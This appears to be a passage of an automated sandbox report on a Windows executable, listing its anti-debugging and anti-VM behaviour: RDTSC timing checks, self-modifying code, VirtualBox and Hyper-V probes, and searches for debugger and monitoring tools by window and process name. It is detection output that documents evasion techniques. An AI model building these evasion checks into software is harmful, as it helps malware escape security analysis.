Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1312 second address: 78B1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA94CE9192Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1329 second address: 78B13A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007FA94CE9352Dh 0x0000000c adc ax, F6C6h 0x00000011 jmp 00007FA94CE93531h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+14h], eax 0x0000001d jmp 00007FA94CE9352Eh 0x00000022 mov eax, dword ptr [esi+18h] 0x00000025 pushad 0x00000026 push ecx 0x00000027 mov eax, edx 0x00000029 pop edx 0x0000002a jmp 00007FA94CE93536h 0x0000002f popad 0x00000030 mov dword ptr [edx+18h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FA94CE93537h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B13A3 second address: 78B141D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE91932h 0x00000009 or eax, 391FBF58h 0x0000000f jmp 00007FA94CE9192Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+1Ch] 0x0000001b jmp 00007FA94CE91936h 0x00000020 mov dword ptr [edx+1Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FA94CE9192Dh 0x0000002b pushfd 0x0000002c jmp 00007FA94CE91930h 0x00000031 adc cx, 8418h 0x00000036 jmp 00007FA94CE9192Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B141D second address: 78B1490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c jmp 00007FA94CE9352Eh 0x00000011 mov dword ptr [edx+20h], eax 0x00000014 pushad 0x00000015 mov di, si 0x00000018 movzx eax, di 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+24h] 0x0000001f jmp 00007FA94CE93535h 0x00000024 mov dword ptr [edx+24h], eax 0x00000027 jmp 00007FA94CE9352Eh 0x0000002c mov eax, dword ptr [esi+28h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA94CE9352Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1490 second address: 78B149F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B149F second address: 78B150E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007FA94CE9352Eh 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 jmp 00007FA94CE93530h 0x00000019 mov dword ptr [edx+2Ch], ecx 0x0000001c jmp 00007FA94CE93530h 0x00000021 mov ax, word ptr [esi+30h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FA94CE9352Dh 0x0000002d pop eax 0x0000002e mov edx, 5BC3AE34h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B150E second address: 78B159A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A5FFh 0x00000007 jmp 00007FA94CE91934h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [edx+30h], ax 0x00000013 jmp 00007FA94CE91930h 0x00000018 mov ax, word ptr [esi+32h] 0x0000001c jmp 00007FA94CE91930h 0x00000021 mov word ptr [edx+32h], ax 0x00000025 jmp 00007FA94CE91930h 0x0000002a mov eax, dword ptr [esi+34h] 0x0000002d jmp 00007FA94CE91930h 0x00000032 mov dword ptr [edx+34h], eax 0x00000035 jmp 00007FA94CE91930h 0x0000003a test ecx, 00000700h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B159A second address: 78B15A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B15A0 second address: 78B15E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE91932h 0x00000009 and esi, 46B3E638h 0x0000000f jmp 00007FA94CE9192Bh 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007FA9BCABFA70h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA94CE91931h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B15E6 second address: 78B1655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007FA94CE93533h 0x0000000b jmp 00007FA94CE93533h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 pushad 0x00000019 jmp 00007FA94CE93534h 0x0000001e mov dx, si 0x00000021 popad 0x00000022 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA94CE9352Ah 0x0000002d add ah, FFFFFF88h 0x00000030 jmp 00007FA94CE9352Bh 0x00000035 popfd 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1655 second address: 78B1692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 39B3221Bh 0x00000009 popad 0x0000000a popad 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007FA94CE91936h 0x0000001b add ax, AA18h 0x00000020 jmp 00007FA94CE9192Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BB3 second address: 7900BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BB7 second address: 7900BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BBB second address: 7900BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BC1 second address: 7900BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BD6 second address: 7900BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BDA second address: 7900BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BF7 second address: 7900BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900BFD second address: 7900C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900C01 second address: 7900C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA94CE93535h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900C21 second address: 7900C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 27h 0x0000000d mov esi, edx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007FA94CE9192Bh 0x00000017 pop ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7900C50 second address: 7900C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78A06CB second address: 78A072D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA94CE91935h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FA94CE91931h 0x0000000f sbb ax, E7D6h 0x00000014 jmp 00007FA94CE91931h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA94CE91938h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78A072D second address: 78A073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78A073C second address: 78A0742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78A0742 second address: 78A0746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78A0746 second address: 78A0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edx 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840025 second address: 7840029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840029 second address: 784002F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 784002F second address: 7840067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA94CE9352Ch 0x00000013 sbb ecx, 3911D368h 0x00000019 jmp 00007FA94CE9352Bh 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840067 second address: 7840092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 1Ah 0x00000005 mov ax, 2BF3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FA94CE91936h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840784 second address: 784079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE93534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840BD3 second address: 7840C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov di, 827Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007FA94CE91936h 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov dx, ax 0x00000020 pushfd 0x00000021 jmp 00007FA94CE9192Ah 0x00000026 or cx, 7CA8h 0x0000002b jmp 00007FA94CE9192Bh 0x00000030 popfd 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA94CE91930h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7840C36 second address: 7840C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7890B29 second address: 7890B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE9192Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7890B39 second address: 7890B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7890B3D second address: 7890B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ax, 19EFh 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 pushad 0x00000014 movsx edx, cx 0x00000017 mov ah, 5Ch 0x00000019 popad 0x0000001a popad 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA94CE9192Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7890B6B second address: 7890BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE93531h 0x00000009 sub cl, FFFFFFB6h 0x0000000c jmp 00007FA94CE93531h 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FA94CE93538h 0x00000021 sbb ch, 00000008h 0x00000024 jmp 00007FA94CE9352Bh 0x00000029 popfd 0x0000002a jmp 00007FA94CE93538h 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA94CE93537h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 787012F second address: 7870205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA94CE91937h 0x00000008 pop esi 0x00000009 mov ecx, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA94CE9192Eh 0x00000016 adc esi, 4F047158h 0x0000001c jmp 00007FA94CE9192Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esp], edi 0x00000026 jmp 00007FA94CE91935h 0x0000002b mov edi, dword ptr [ebp+08h] 0x0000002e jmp 00007FA94CE9192Eh 0x00000033 mov dword ptr [esp+24h], 00000000h 0x0000003b jmp 00007FA94CE91930h 0x00000040 lock bts dword ptr [edi], 00000000h 0x00000045 jmp 00007FA94CE91930h 0x0000004a jc 00007FA9BCC63B90h 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007FA94CE9192Eh 0x00000057 sbb ax, A078h 0x0000005c jmp 00007FA94CE9192Bh 0x00000061 popfd 0x00000062 mov bx, cx 0x00000065 popad 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FA94CE9192Ch 0x00000070 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870205 second address: 7870209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870209 second address: 787020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 787020F second address: 7870215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870215 second address: 7870219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870219 second address: 7870234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA94CE9352Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870234 second address: 7870243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870243 second address: 7870267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 7870267 second address: 787027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 787027A second address: 78702BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007FA94CE9352Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FA94CE9352Dh 0x00000019 pop eax 0x0000001a mov ecx, edx 0x0000001c popad 0x0000001d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Special instruction interceptor: First address: 13E56B8 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Code function: 0_2_00CC9980 rdtsc

0_2_00CC9980

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AE255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_00AE255D
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AE29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_00AE29FF

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Code function: 0_2_00AE255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00AE255D

Source: Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F6C000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526346109.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550422328.0000000001FAC000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526031038.0000000001FA6000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526592917.0000000001FAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq Q
Source: Hqle5OSmLQ.exe, 00000000.00000003.1439355713.0000000001F45000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1438943499.0000000001F42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: Hqle5OSmLQ.exe	Binary or memory string: Hyper-V RAW
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Hqle5OSmLQ.exe, 00000000.00000003.1441328246.0000000007121000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=L
Source: Hqle5OSmLQ.exe, 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File opened: SICE
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Code function: 0_2_00CC9980 rdtsc

0_2_00CC9980

Source: Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: w&Program Manager

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
